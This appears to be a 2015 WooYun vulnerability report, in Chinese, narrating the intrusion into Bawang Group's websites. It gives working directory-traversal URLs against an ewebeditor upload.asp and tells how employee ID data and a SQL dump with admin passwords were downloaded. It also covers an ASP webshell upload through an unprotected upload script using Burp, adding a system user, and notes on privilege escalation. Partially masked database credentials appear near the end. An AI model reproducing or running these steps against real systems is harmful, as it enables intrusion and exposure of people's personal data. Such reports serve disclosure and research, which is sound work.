当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113572

漏洞标题:看我如何getshell霸王官网多家知名品牌侧漏可进内网(修复不完全导致的一系列残局)

相关厂商:霸王集团

漏洞作者: 小龙

提交时间:2015-05-12 10:08

修复时间:2015-06-26 10:10

公开时间:2015-06-26 10:10

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我把错的过程也写上来了哦。希望洞被忽略了,审核可以把rank补上,谢谢,看了漏洞没修复,直接忽略了,我想说。。 “做的非常好” 厂商我是想你没看到过一个弱口令渗透整个内网的,比你这个还可怕呢- -

详细说明:

 WooYun: 霸王洗发水旗下某站点弱口令+任意文件遍历/下载


根据前人他找到了一个dir列目录。也就是ewebeditor哪里。

漏洞证明:
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../..
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../AppServ/www


1.png


我们可以看到有个叫“霸王”的目录,一般厂商都喜欢这样命名,那么有个缺陷。。就是容易找。。。
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang
然后到了根目录
有几个比较显眼的目录“OA” “WAP”

2.png


好熟悉的界面,可能有人说我要用titnk的那个执行漏洞了
很可惜不是的。。。

3.png


http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/OA
员工资料-总部.xls
这个下载下来或许有用。。

4.png


216个身份证。
呵呵,估计有搞头
dengsw@bawang.com.cn
4416
登陆成功
看到了龙哥的高清无码图- -

5.png


6.png


发布文章是没权限的。有权限的话估计也没戏。。。
然后
版本:2013-10-9 制作:IT部_胡熔 Email:rong.hu@bawang.com.cn
rong.hu@bawang.com.cn
这个制作者难道也没权限吗?
我试了试,他是没办法的。。因为密码被他改了。。。
无奈,只能进WAP这个目录看看咯,直接转到了
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/wap/nianhui

bw_nianhui.sql	63028 B	2015-5-12 1:17:55	2015-1-15 16:10:56	
	bw_nianhui.sql.zip


这两个东西可能有用
但是sql后缀一碰到就错误页面。。。
但是zip还是可以的。哈哈
我们直接导入phpmyadmin里面
找到账号密码
admin hneadmins
hneadmin hneadmin888
后台:http://www.bawang.com.cn/wap/nianhui/admins/login.php
带着比较好的理想,霸王这么得股控公司应该会舍得投钱做个好点功能多点的后台

7.png


一个上传的地方都没,可以说根本没图片。。。
无语了

8.png


我还尝试添加文字,看看那个配置下看有没配置文件,判断他的KB大小
很可惜没有。。
转啊转,转到了这里

http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/wap/nianhui/admins/upfiles/up


纳尼?
上传目录有rar还有jpg?

9.png


那就是说肯定有上传的,不可能没有,而且这个上传还可以上传一个rar文件,还是有希望的。。
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../bawang/wap/nianhui/admins/upload/
看到这里有个upFiles.php
我们访问下看看吧。。再不行就关浏览器了。。
http://www.bawang.com.cn/wap/nianhui/admins/upload/upFiles.php
这边没图了。不知道咋了。。
我直接上传进去了。,burp截断
上传了一个asp图片马
虽然打不开了。,但是他的插件不规范,各种上传插件。。
http://www.bawang.com.cn/wap/nianhui/admins/upload/index.php
这还有个。。
看图吧。。

10.png


11.png


找不到路径- -

HTTP/1.1 200 OK
Connection: close
Date: Mon, 11 May 2015 18:27:18 GMT
Server: WWW Server/1.1
X-Powered-By: ASP.NET
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
X-Safe-Firewall: zhuji.360.cn 1.0.8.1 F1W1
 
<html> 
<head> 
<title>M4U BLOG - fywyj.cn</title> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<style type="text/css">
body{ background-color:#DAEED5}
body,td{font-family:tahoma,verdana,arial;font-size:12px;line-height:20px;color:#333333;margin-left:0px; padding:3px 0 0 5px;} 
strong{font-size:12px;} 
aink{color:#0066CC;} 
a:hover{color:#FF6600;} 
aisited{color:#003366;} 
a:active{color:#9DCC00;} 
table.itable{} 
td.irows{height:20px;background:url("index.php?i=dots" repeat-x bottom}</style> 
</head> 
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
 <font color=red>ò??-3é1|é?′?</font> ???t??:<font color=blue>../../FileLocal/1431368838.asp</font> <span onClick="location.href('?formname=&forminputname=')" style="cursor:hand">??D?é?′?</span> <br><br>
<script language = "JavaScript">
parent...value='FileLocal/1431368838.asp';
//parent.form1.imgs.src='/uploadfile/1431368838.asp';
</Script>


OK,已经getshell了
这个上传插件比较鸡肋。。但是那个现在没了,。没好复现了
我也不知道为啥。。
但是这个也可以任意上传
http://www.bawang.com.cn/bawang/wap/nianhui/admins/upfiles/up/1431366459.asp
图片马在这里

12.png


留个纪念吧,O(∩_∩)O

13.png


14.png


15.png


16.png


添加用户成功了
还支持ASPX
- -
Terminal Service端口为:3389
进内网只需要一个外网服务器,但是我不是渗透牛哈。没有那么多服务器。。。
udf提权即可

17.png


确实上传进去了。呵呵

漏洞证明:

$conn=mysql_connect("localhost", "root","P@ssw0rdb*******");
霸王数据库
<?php 
session_start();
$HNE="hne_";
//die('骞翠細杩樻病姝e紡寮€濮嬶紝璋㈣阿鍏虫敞锛佺浣犵敓娲绘剦蹇珇');
$conn=mysql_connect("localhost", "root","P@ssw0r*******");
$sqlname="bw_nianhui";//鏁版嵁搴撶殑鍚?
追风数据库:
>PConnect('localhost','zhuifeng','KB3F:*******','zhuifeng(hangen)') or die('connection 
霸王国际大酒店
//'DB_DSN'=>'mysql://root:sa@localhost:3306/thinkphp',
	//鏁版嵁搴撻厤缃柟寮?甯歌鏂瑰紡
	'DB_TYPE'=>'mysql',//绫绘嵁搴撶被鍨?-鎸囪繛鎺ョ被鍨?
	'DB_HOST'=>'localhost',//涓绘満
	'DB_NAME'=>'cms_hotel',//鏁版嵁搴撳悕
	'DB_USER'=>'hotelbawang',//鏁版嵁搴撶敤鎴峰悕
	'DB_PWD'=>'AaxbWN**********',//鏁版嵁搴撳瘑鐮?
	'DB_PORT'=>'3306',//绔彛鍙?
	'DB_PREFIX'=>'hurong_',//鏁版嵁搴撹〃鍓嶈緧
	目测主站数据库。。。。
	
	t("localhost","bawang_xifashui","4fNYnpz*******") or die (mysql_error());//
 $selected = mysql_select_db("bawang_xifashui",$link) or die(mysql_error());


修复方案:

1:快速修复漏洞。避免惨遭酿局。。
2:把我上传的webshell删掉吧-。-

版权声明:转载请注明来源 小龙@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:20 (WooYun评价)